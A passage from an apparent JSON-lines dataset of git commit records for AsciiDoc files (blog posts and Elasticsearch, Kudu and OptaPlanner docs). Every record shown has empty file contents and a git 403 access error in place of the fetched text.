pressTV\/elasticsearch,naveenhooda2000\/elasticsearch,Widen\/elasticsearch,i-am-Nathan\/elasticsearch,mjason3\/elasticsearch,dongjoon-hyun\/elasticsearch,LeoYao\/elasticsearch,episerver\/elasticsearch,mbrukman\/elasticsearch,avikurapati\/elasticsearch,alexshadow007\/elasticsearch,koxa29\/elasticsearch,kunallimaye\/elasticsearch,snikch\/elasticsearch,aglne\/elasticsearch,andrestc\/elasticsearch,mcku\/elasticsearch,drewr\/elasticsearch,rhoml\/elasticsearch,LewayneNaidoo\/elasticsearch,beiske\/elasticsearch,mapr\/elasticsearch,apepper\/elasticsearch,robin13\/elasticsearch,linglaiyao1314\/elasticsearch,gmarz\/elasticsearch,cnfire\/elasticsearch-1,jpountz\/elasticsearch,infusionsoft\/elasticsearch,KimTaehee\/elasticsearch,kevinkluge\/elasticsearch,scottsom\/elasticsearch,zhiqinghuang\/elasticsearch,alexkuk\/elasticsearch,kenshin233\/elasticsearch,ZTE-PaaS\/elasticsearch,gfyoung\/elasticsearch,onegambler\/elasticsearch,Ansh90\/elasticsearch,fforbeck\/elasticsearch,liweinan0423\/elasticsearch,avikurapati\/elasticsearch,wimvds\/elasticsearch,SergVro\/elasticsearch,linglaiyao1314\/elasticsearch,naveenhooda2000\/elasticsearch,geidies\/elasticsearch,mmaracic\/elasticsearch,fekaputra\/elasticsearch,pablocastro\/elasticsearch,kenshin233\/elasticsearch,strapdata\/elassandra,henakamaMSFT\/elasticsearch,MichaelLiZhou\/elasticsearch,acchen97\/elasticsearch,rajanm\/elasticsearch,wittyameta\/elasticsearch,wittyameta\/elasticsearch,pranavraman\/elasticsearch,ckclark\/elasticsearch,sreeramjayan\/elasticsearch,Uiho\/elasticsearch,hechunwen\/elasticsearch,overcome\/elasticsearch,obourgain\/elasticsearch,Helen-Zhao\/elasticsearch,HarishAtGitHub\/elasticsearch,vietlq\/elasticsearch,girirajsharma\/elasticsearch,infusionsoft\/elasticsearch,alexkuk\/elasticsearch,djschny\/elasticsearch,NBSW\/elasticsearch,mortonsykes\/elasticsearch,hechunwen\/elasticsearch,MichaelLiZhou\/elasticsearch,cwurm\/elasticsearch,pranavraman\/elasticsearch,TonyChai24\/ESSource,tkssharma\/elasticsearch,fred84\/elasticsearch,kubum\/elasticsearch,kalburgimanjunath\/elasticsearch,robin13\/elasticsearch,iacdingping\/elasticsearch,Stacey-Gammon\/elasticsearch,wimvds\/elasticsearch,wimvds\/elasticsearch,sneivandt\/elasticsearch,mgalushka\/elasticsearch,wangtuo\/elasticsearch,ESamir\/elasticsearch,Fsero\/elasticsearch,nazarewk\/elasticsearch,geidies\/elasticsearch,AshishThakur\/elasticsearch,sposam\/elasticsearch,weipinghe\/elasticsearch,girirajsharma\/elasticsearch,sc0ttkclark\/elasticsearch,AndreKR\/elasticsearch,Chhunlong\/elasticsearch,kevinkluge\/elasticsearch,shreejay\/elasticsearch,xingguang2013\/elasticsearch,jeteve\/elasticsearch,sneivandt\/elasticsearch,fernandozhu\/elasticsearch,hirdesh2008\/elasticsearch,rlugojr\/elasticsearch,jimczi\/elasticsearch,mkis-\/elasticsearch,YosuaMichael\/elasticsearch,EasonYi\/elasticsearch,MaineC\/elasticsearch,apepper\/elasticsearch,18098924759\/elasticsearch,Charlesdong\/elasticsearch,amaliujia\/elasticsearch,luiseduardohdbackup\/elasticsearch,sauravmondallive\/elasticsearch,Kakakakakku\/elasticsearch,hafkensite\/elasticsearch,hafkensite\/elasticsearch,caengcjd\/elasticsearch,bestwpw\/elasticsearch,truemped\/elasticsearch,mbrukman\/elasticsearch,hechunwen\/elasticsearch,YosuaMichael\/elasticsearch,palecur\/elasticsearch,sneivandt\/elasticsearch,szroland\/elasticsearch,mgalushka\/elasticsearch,slavau\/elasticsearch,ivansun1010\/elasticsearch,Collaborne\/elasticsearch,sneivandt\/elasticsearch,karthikjaps\/elasticsearch,dataduke\/elasticsearch,kaneshin\/elasticsearch,apepper\/elasticsearch,rajanm\/elasticsearch,Charlesdong\/elasticsearch,djschny\/elasticsearch,mnylen\/elasticsearch,mrorii\/elasticsearch,loconsolutions\/elasticsearch,abibell\/elasticsearch,mikemccand\/elasticsearch,lzo\/elasticsearch-1,alexkuk\/elasticsearch,jw0201\/elastic,caengcjd\/elasticsearch,Rygbee\/elasticsearch,markwalkom\/elasticsearch,hechunwen\/elasticsearch,mbrukman\/elasticsearch,hanswang\/elasticsearch,huypx1292\/elasticsearch,artnowo\/elasticsearch,jaynblue\/elasticsearch,djschny\/elasticsearch,kalburgimanjunath\/elasticsearch,tebriel\/elasticsearch,lzo\/elasticsearch-1,scottsom\/elasticsearch,jimhooker2002\/elasticsearch,obourgain\/elasticsearch,sposam\/elasticsearch,kubum\/elasticsearch,davidvgalbraith\/elasticsearch,Chhunlong\/elasticsearch,MichaelLiZhou\/elasticsearch,masaruh\/elasticsearch,scorpionvicky\/elasticsearch,Shepard1212\/elasticsearch,tsohil\/elasticsearch,Siddartha07\/elasticsearch,fernandozhu\/elasticsearch,cnfire\/elasticsearch-1,kcompher\/elasticsearch,masterweb121\/elasticsearch,schonfeld\/elasticsearch,Kakakakakku\/elasticsearch,wimvds\/elasticsearch,fekaputra\/elasticsearch,sreeramjayan\/elasticsearch,adrianbk\/elasticsearch,mute\/elasticsearch,rlugojr\/elasticsearch,andrestc\/elasticsearch,Liziyao\/elasticsearch,Chhunlong\/elasticsearch,henakamaMSFT\/elasticsearch,nrkkalyan\/elasticsearch,franklanganke\/elasticsearch,mbrukman\/elasticsearch,fooljohnny\/elasticsearch,pranavraman\/elasticsearch,socialrank\/elasticsearch,nilabhsagar\/elasticsearch,nilabhsagar\/elasticsearch,kalburgimanjunath\/elasticsearch,wangyuxue\/elasticsearch,wenpos\/elasticsearch,iacdingping\/elasticsearch,iacdingping\/elasticsearch,njlawton\/elasticsearch,markwalkom\/elasticsearch,mbrukman\/elasticsearch,AshishThakur\/elasticsearch,PhaedrusTheGreek\/elasticsearch,wangtuo\/elasticsearch,golubev\/elasticsearch,Charlesdong\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,sc0ttkclark\/elasticsearch,Charlesdong\/elasticsearch,tahaemin\/elasticsearch,rento19962\/elasticsearch,Shekharrajak\/elasticsearch,mrorii\/elasticsearch,camilojd\/elasticsearch,sarwarbhuiyan\/elasticsearch,jango2015\/elasticsearch,TonyChai24\/ESSource,pritishppai\/elasticsearch,MetSystem\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,areek\/elasticsearch,mm0\/elasticsearch,Widen\/elasticsearch,kcompher\/elasticsearch,markwalkom\/elasticsearch,Helen-Zhao\/elasticsearch,hydro2k\/elasticsearch,sreeramjayan\/elasticsearch,djschny\/elasticsearch,Rygbee\/elasticsearch,strapdata\/elassandra-test,AshishThakur\/elasticsearch,ydsakyclguozi\/elasticsearch,golubev\/elasticsearch,truemped\/elasticsearch,mkis-\/elasticsearch,lydonchandra\/elasticsearch,martinstuga\/elasticsearch,umeshdangat\/elasticsearch,shreejay\/elasticsearch,queirozfcom\/elasticsearch,nomoa\/elasticsearch,markharwood\/elasticsearch,JervyShi\/elasticsearch,nknize\/elasticsearch,humandb\/elasticsearch,lchennup\/elasticsearch,achow\/elasticsearch,markharwood\/elasticsearch,dylan8902\/elasticsearch,skearns64\/elasticsearch,nrkkalyan\/elasticsearch,lightslife\/elasticsearch,fred84\/elasticsearch,lchennup\/elasticsearch,nomoa\/elasticsearch,JackyMai\/elasticsearch,iamjakob\/elasticsearch,markllama\/elasticsearch,rento19962\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,cwurm\/elasticsearch,clintongormley\/elasticsearch,jango2015\/elasticsearch,smflorentino\/elasticsearch,amaliujia\/elasticsearch,AndreKR\/elasticsearch,alexkuk\/elasticsearch,weipinghe\/elasticsearch,Collaborne\/elasticsearch,Ansh90\/elasticsearch,mohit\/elasticsearch,springning\/elasticsearch,rhoml\/elasticsearch,skearns64\/elasticsearch,njlawton\/elasticsearch,myelin\/elasticsearch,socialrank\/elasticsearch,btiernay\/elasticsearch,slavau\/elasticsearch,rajanm\/elasticsearch,yynil\/elasticsearch,xuzha\/elasticsearch,jpountz\/elasticsearch,LeoYao\/elasticsearch,xingguang2013\/elasticsearch,yongminxia\/elasticsearch,linglaiyao1314\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,palecur\/elasticsearch,sarwarbhuiyan\/elasticsearch,lightslife\/elasticsearch,lchennup\/elasticsearch,mikemccand\/elasticsearch,lzo\/elasticsearch-1,fred84\/elasticsearch,petabytedata\/elasticsearch,yuy168\/elasticsearch,qwerty4030\/elasticsearch,jimczi\/elasticsearch,javachengwc\/elasticsearch,kevinkluge\/elasticsearch,jeteve\/elasticsearch,luiseduardohdbackup\/elasticsearch,springning\/elasticsearch,phani546\/elasticsearch,MetSystem\/elasticsearch,weipinghe\/elasticsearch,kunallimaye\/elasticsearch,jimhooker2002\/elasticsearch,wayeast\/elasticsearch,F0lha\/elasticsearch,pozhidaevak\/elasticsearch,luiseduardohdbackup\/elasticsearch,masterweb121\/elasticsearch,gingerwizard\/elasticsearch,jaynblue\/elasticsearch,luiseduardohdbackup\/elasticsearch,bawse\/elasticsearch,maddin2016\/elasticsearch,sc0ttkclark\/elasticsearch,mohit\/elasticsearch,linglaiyao1314\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,rento19962\/elasticsearch,lmtwga\/elasticsearch,strapdata\/elassandra-test,wbowling\/elasticsearch,lks21c\/elasticsearch,karthikjaps\/elasticsearch,palecur\/elasticsearch,pritishppai\/elasticsearch,szroland\/elasticsearch,F0lha\/elasticsearch,slavau\/elasticsearch,davidvgalbraith\/elasticsearch,mkis-\/elasticsearch,JervyShi\/elasticsearch,golubev\/elasticsearch,pozhidaevak\/elasticsearch,trangvh\/elasticsearch,strapdata\/elassandra,MichaelLiZhou\/elasticsearch,18098924759\/elasticsearch,huypx1292\/elasticsearch,mute\/elasticsearch,milodky\/elasticsearch,markharwood\/elasticsearch,HonzaKral\/elasticsearch,yongminxia\/elasticsearch,sauravmondallive\/elasticsearch,onegambler\/elasticsearch,vvcephei\/elasticsearch,mm0\/elasticsearch,amaliujia\/elasticsearch,wayeast\/elasticsearch,springning\/elasticsearch,areek\/elasticsearch,gmarz\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,mjhennig\/elasticsearch,achow\/elasticsearch,kunallimaye\/elasticsearch,huypx1292\/elasticsearch,xingguang2013\/elasticsearch,koxa29\/elasticsearch,zhiqinghuang\/elasticsearch,LeoYao\/elasticsearch,ImpressTV\/elasticsearch,LewayneNaidoo\/elasticsearch,likaiwalkman\/elasticsearch,overcome\/elasticsearch,dylan8902\/elasticsearch,JervyShi\/elasticsearch,onegambler\/elasticsearch,xpandan\/elasticsearch,nezirus\/elasticsearch,ckclark\/elasticsearch,areek\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,xpandan\/elasticsearch,fooljohnny\/elasticsearch,JervyShi\/elasticsearch,cnfire\/elasticsearch-1,uschindler\/elasticsearch,amit-shar\/elasticsearch,achow\/elasticsearch,fekaputra\/elasticsearch,dongjoon-hyun\/elasticsearch,vietlq\/elasticsearch,tsohil\/elasticsearch,likaiwalkman\/elasticsearch,henakamaMSFT\/elasticsearch,tsohil\/elasticsearch,rmuir\/elasticsearch,pranavraman\/elasticsearch,chirilo\/elasticsearch,rento19962\/elasticsearch,kunallimaye\/elasticsearch,nrkkalyan\/elasticsearch,ImpressTV\/elasticsearch,thecocce\/elasticsearch,phani546\/elasticsearch,nrkkalyan\/elasticsearch,aglne\/elasticsearch,nezirus\/elasticsearch,springning\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,artnowo\/elasticsearch,onegambler\/elasticsearch,pranavraman\/elasticsearch,tebriel\/elasticsearch,NBSW\/elasticsearch,jango2015\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,uschindler\/elasticsearch,YosuaMichael\/elasticsearch,umeshdangat\/elasticsearch,naveenhooda2000\/elasticsearch,polyfractal\/elasticsearch,mapr\/elasticsearch,NBSW\/elasticsearch,vvcephei\/elasticsearch,KimTaehee\/elasticsearch,cwurm\/elasticsearch,Kakakakakku\/elasticsearch,beiske\/elasticsearch,mjhennig\/elasticsearch,hirdesh2008\/elasticsearch,kevinkluge\/elasticsearch,xpandan\/elasticsearch,phani546\/elasticsearch,mortonsykes\/elasticsearch,slavau\/elasticsearch,kcompher\/elasticsearch,Ansh90\/elasticsearch,myelin\/elasticsearch,avikurapati\/elasticsearch,koxa29\/elasticsearch,linglaiyao1314\/elasticsearch,nellicus\/elasticsearch,sauravmondallive\/elasticsearch,dataduke\/elasticsearch,jchampion\/elasticsearch,wangyuxue\/elasticsearch,hydro2k\/elasticsearch,maddin2016\/elasticsearch,TonyChai24\/ESSource,gfyoung\/elasticsearch,clintongormley\/elasticsearch,luiseduardohdbackup\/elasticsearch,likaiwalkman\/elasticsearch,sreeramjayan\/elasticsearch,kevinkluge\/elasticsearch,yanjunh\/elasticsearch,iantruslove\/elasticsearch,sc0ttkclark\/elasticsearch,EasonYi\/elasticsearch,golubev\/elasticsearch,thecocce\/elasticsearch,Flipkart\/elasticsearch,milodky\/elasticsearch,schonfeld\/elasticsearch,fooljohnny\/elasticsearch,GlenRSmith\/elasticsearch,markllama\/elasticsearch,amaliujia\/elasticsearch,fekaputra\/elasticsearch,ivansun1010\/elasticsearch,ricardocerq\/elasticsearch,nknize\/elasticsearch,diendt\/elasticsearch,tkssharma\/elasticsearch,rmuir\/elasticsearch,socialrank\/elasticsearch,jbertouch\/elasticsearch,alexbrasetvik\/elasticsearch,zeroctu\/elasticsearch,Chhunlong\/elasticsearch,pranavraman\/elasticsearch,rhoml\/elasticsearch,beiske\/elasticsearch,a2lin\/elasticsearch,Shepard1212\/elasticsearch,jsgao0\/elasticsearch,Liziyao\/elasticsearch,Flipkart\/elasticsearch,wimvds\/elasticsearch,coding0011\/elasticsearch,Brijeshrpatel9\/elasticsearch,fooljohnny\/elasticsearch,slavau\/elasticsearch,Uiho\/elasticsearch,episerver\/elasticsearch,humandb\/elasticsearch,ydsakyclguozi\/elasticsearch,yynil\/elasticsearch,qwerty4030\/elasticsearch,jeteve\/elasticsearch,ouyangkongtong\/elasticsearch,easonC\/elasticsearch,iamjakob\/elasticsearch,F0lha\/elasticsearch,davidvgalbraith\/elasticsearch,hydro2k\/elasticsearch,KimTaehee\/elasticsearch,andrejserafim\/elasticsearch,geidies\/elasticsearch,TonyChai24\/ESSource,strapdata\/elassandra5-rc,elancom\/elasticsearch,mgalushka\/elasticsearch,himanshuag\/elasticsearch,lydonchandra\/elasticsearch,humandb\/elasticsearch,bestwpw\/elasticsearch,snikch\/elasticsearch,nknize\/elasticsearch,jeteve\/elasticsearch,bestwpw\/elasticsearch,18098924759\/elasticsearch,infusionsoft\/elasticsearch,kunallimaye\/elasticsearch,HonzaKral\/elasticsearch,andrestc\/elasticsearch,tsohil\/elasticsearch,kenshin233\/elasticsearch,iacdingping\/elasticsearch,JSCooke\/elasticsearch,mm0\/elasticsearch,kcompher\/elasticsearch,ydsakyclguozi\/elasticsearch,fekaputra\/elasticsearch,kalburgimanjunath\/elasticsearch,sreeramjayan\/elasticsearch,avikurapati\/elasticsearch,geidies\/elasticsearch,coding0011\/elasticsearch,aglne\/elasticsearch,brandonkearby\/elasticsearch,ricardocerq\/elasticsearch,masaruh\/elasticsearch,MisterAndersen\/elasticsearch,truemped\/elasticsearch,ZTE-PaaS\/elasticsearch,yuy168\/elasticsearch,Collaborne\/elasticsearch,Fsero\/elasticsearch,yanjunh\/elasticsearch,ThalaivaStars\/OrgRepo1,episerver\/elasticsearch,mohit\/elasticsearch,ImpressTV\/elasticsearch,Widen\/elasticsearch,awislowski\/elasticsearch,cwurm\/elasticsearch,lmtwga\/elasticsearch,jsgao0\/elasticsearch,camilojd\/elasticsearch,wbowling\/elasticsearch,tahaemin\/elasticsearch,koxa29\/elasticsearch,girirajsharma\/elasticsearch,ThalaivaStars\/OrgRepo1,nazarewk\/elasticsearch,alexshadow007\/elasticsearch,kunallimaye\/elasticsearch,MaineC\/elasticsearch,slavau\/elasticsearch,himanshuag\/elasticsearch,mnylen\/elasticsearch,Liziyao\/elasticsearch,jw0201\/elastic,mm0\/elasticsearch,liweinan0423\/elasticsearch,mrorii\/elasticsearch,nellicus\/elasticsearch,Charlesdong\/elasticsearch,markwalkom\/elasticsearch,pablocastro\/elasticsearch,MisterAndersen\/elasticsearch,queirozfcom\/elasticsearch,wbowling\/elasticsearch,cnfire\/elasticsearch-1,kaneshin\/elasticsearch,Chhunlong\/elasticsearch,apepper\/elasticsearch,fooljohnny\/elasticsearch,ESamir\/elasticsearch,Shekharrajak\/elasticsearch,sarwarbhuiyan\/elasticsearch,i-am-Nathan\/elasticsearch,khiraiwa\/elasticsearch,pozhidaevak\/elasticsearch,Siddartha07\/elasticsearch,winstonewert\/elasticsearch,mjason3\/elasticsearch,glefloch\/elasticsearch,wuranbo\/elasticsearch,jango2015\/elasticsearch,MetSystem\/elasticsearch,Collaborne\/elasticsearch,naveenhooda2000\/elasticsearch,yongminxia\/elasticsearch,hanswang\/elasticsearch,springning\/elasticsearch,hanswang\/elasticsearch,kaneshin\/elasticsearch,strapdata\/elassandra-test,abibell\/elasticsearch,awislowski\/elasticsearch,Stacey-Gammon\/elasticsearch,mcku\/elasticsearch,javachengwc\/elasticsearch,avikurapati\/elasticsearch,schonfeld\/elasticsearch,kalburgimanjunath\/elasticsearch,dongjoon-hyun\/elasticsearch,rlugojr\/elasticsearch,scorpionvicky\/elasticsearch,jimhooker2002\/elasticsearch,szroland\/elasticsearch,wayeast\/elasticsearch,kcompher\/elasticsearch,andrejserafim\/elasticsearch,zeroctu\/elasticsearch,sdauletau\/elasticsearch,dylan8902\/elasticsearch,Widen\/elasticsearch,himanshuag\/elasticsearch,mgalushka\/elasticsearch,aglne\/elasticsearch,kimimj\/elasticsearch,sarwarbhuiyan\/elasticsearch,masterweb121\/elasticsearch,jimhooker2002\/elasticsearch,pranavraman\/elasticsearch,jeteve\/elasticsearch,dpursehouse\/elasticsearch","old_file":"docs\/reference\/modules\/http.asciidoc","new_file":"docs\/reference\/modules\/http.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c32203920a26620c12e8329ae235c49b9c510421","subject":"y2b create post This Slime Could Be Good For Your Phone...","message":"y2b create post This Slime Could Be Good For Your Phone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-01-This-Slime-Could-Be-Good-For-Your-Phone.adoc","new_file":"_posts\/2018-01-01-This-Slime-Could-Be-Good-For-Your-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d68ce5d0f65fbf30bf77c6295c3a030e1263559f","subject":"Update 2016-03-29-Zonas-de-transferencia.adoc","message":"Update 2016-03-29-Zonas-de-transferencia.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6aaec6efebd6e842967fab30689d072bcc5d002d","subject":"\u52a0\u85e4 \u6295\u7a3f\u30d5\u30a1\u30a4\u30eb\u8ffd\u52a0","message":"\u52a0\u85e4 \u6295\u7a3f\u30d5\u30a1\u30a4\u30eb\u8ffd\u52a0\n","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-15-Kato-Google-App-Script.adoc","new_file":"_posts\/2016-04-15-Kato-Google-App-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50b7673d82262444708713eed01ce9b87de0c231","subject":"Publish 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","message":"Publish 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","new_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37c105f350bad248c532d2de2b6f78b3ac7b8b98","subject":"Update 2016-06-11-June-chairpersons-Chinwag.adoc","message":"Update 2016-06-11-June-chairpersons-Chinwag.adoc","repos":"Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io","old_file":"_posts\/2016-06-11-June-chairpersons-Chinwag.adoc","new_file":"_posts\/2016-06-11-June-chairpersons-Chinwag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Perthmastersswimming\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13e40b2110790038585ee41e739be284520fb870","subject":"Update 2015-08-17-Title.adoc","message":"Update 2015-08-17-Title.adoc","repos":"gsera\/gsera.github.io,gsera\/gsera.github.io,gsera\/gsera.github.io","old_file":"_posts\/2015-08-17-Title.adoc","new_file":"_posts\/2015-08-17-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gsera\/gsera.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"446ba1ba016ccd3cae9d1bc50c975a7de1ca881d","subject":"Update 2016-09-04-Hello.adoc","message":"Update 2016-09-04-Hello.adoc","repos":"neuni\/neuni.github.io,neuni\/neuni.github.io,neuni\/neuni.github.io,neuni\/neuni.github.io","old_file":"_posts\/2016-09-04-Hello.adoc","new_file":"_posts\/2016-09-04-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neuni\/neuni.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"587fcf253e30ce7e40f75b9c7b5bd22b847c22f1","subject":"Update 2019-11-23-oyl-2.adoc","message":"Update 2019-11-23-oyl-2.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-11-23-oyl-2.adoc","new_file":"_posts\/2019-11-23-oyl-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"158b1e908f804e64bdac5ffac4da476f9a475a2c","subject":"Update 2016-08-25-Sala-de-Chat2.adoc","message":"Update 2016-08-25-Sala-de-Chat2.adoc","repos":"txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io","old_file":"_posts\/2016-08-25-Sala-de-Chat2.adoc","new_file":"_posts\/2016-08-25-Sala-de-Chat2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/txemis\/txemis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c3dcf2196bb6e55e6970712607afb159677f48b","subject":"Update 2017-03-07-Mandar-a-kodi.adoc","message":"Update 2017-03-07-Mandar-a-kodi.adoc","repos":"txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io","old_file":"_posts\/2017-03-07-Mandar-a-kodi.adoc","new_file":"_posts\/2017-03-07-Mandar-a-kodi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/txemis\/txemis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02f6b9552038f5f0a0ee128669292777e9e23165","subject":"Update 2016-05-22-Facebook-hacker-cup-Power-Overwhelming.adoc","message":"Update 2016-05-22-Facebook-hacker-cup-Power-Overwhelming.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2016-05-22-Facebook-hacker-cup-Power-Overwhelming.adoc","new_file":"_posts\/2016-05-22-Facebook-hacker-cup-Power-Overwhelming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9b8bac5312c52ba9602c129e4184924a851e731","subject":"New blog: writing fast constraint streams (#347)","message":"New blog: writing fast constraint streams (#347)\n\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"blog\/2021-05-25-WritingFastConstraintStreamsSecretRecipe.adoc","new_file":"blog\/2021-05-25-WritingFastConstraintStreamsSecretRecipe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/droolsjbpm\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"71f21f0abfed0175c9708a393c7dd74a505954ec","subject":"[doc] added link to online Kudu C++ client API","message":"[doc] added link to online Kudu C++ client API\n\nAdded link to the auto-generated doxygen documentaion for the Kudu\nC++ client API. Besides, fixed broken 'build_from_source' links.\n\nChange-Id: Ie4d77b9b154b635c4aedaced9b050942529cf65f\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4684\nTested-by: Kudu Jenkins\nReviewed-by: Dan Burkert <2591e5f46f28d303f9dc027d475a5c60d8dea17a@cloudera.com>\n","repos":"helifu\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0f13290c0ca0ad1becfbf1bb0ea848f8fa9734a4","subject":"Update 2018-06-25-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-06-25-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6ce39860fd995af660570e98d9348e86da80226","subject":"JSF init","message":"JSF init\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"JSF.adoc","new_file":"JSF.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02fc9a23961696cb5d7fad3d865875bcdcd86912","subject":"y2b create post Incase Perforated Snap Case - iPhone 4 \\u0026 4S Case","message":"y2b create post Incase Perforated Snap Case - iPhone 4 \\u0026 4S 